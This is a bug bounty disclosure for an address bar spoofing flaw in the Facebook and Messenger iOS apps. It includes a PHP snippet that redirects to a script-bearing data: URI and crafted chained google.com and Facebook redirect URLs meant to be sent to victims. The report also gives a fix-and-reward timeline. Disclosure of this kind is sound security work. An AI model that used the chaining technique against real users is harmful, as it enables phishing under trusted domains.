Summary: Facebook & Messenger for iOS was vulnerable to Address Bar spoofing which was be reproduced by navigating from target domain to attackers domain.
Attackers domain was able to set location to data:text/html,<script>…</script> using location header, so it was executed in context while keeping target domain in url bar.
Steps to reproduce:
Setup:
FBiOS : 229.0
MessengerForiOS: 223.0
Device: iPhone 6s
OS : 12.3.1
- create php file with below code snippet:
<?php
header("Location: data:text/html,<script>document.write('<h1>Rahul Kankrale: URL spoofing using Data Uri</h1>')</script>");
?>
and save/host it on server.
- To spoof Facebook domain chain exploit URL like below:
https://www.google.com/url?q=https%3A%2F%2Fmbasic.facebook.com%2Fmessagingconfirmation%3Faction_url%3Dhttps%3A%2F%2Fyourmain%2Fexploit.php
or to spoof google domain
https://www.google.com/url?q=https%3A%2F%2Fyourmain%2Fexploit.php
- By sending those crafted URL to victim through messenger or posting Facebook wall, whenever victim opens google redirect page and click on redirecting url & for facebook poc once message delete page open click on delete button address bar sets to target domain with SSL while content is generated by data uri.
Proof of concept:
Timeline:
- 14/07/2019 : Reported to Facebook bugbounty.
- 16/07/2019 : Pre-Triaged
- 19/08/2019 : Triaged
- 30/09/2019 : Fixed in FB
- 29/10/2019 : Rewarded $1500 for FB(iOS) issue
- 22/01/2020 : Fixed & Rewarded $1500 for Messenger(iOS) issue
Thanks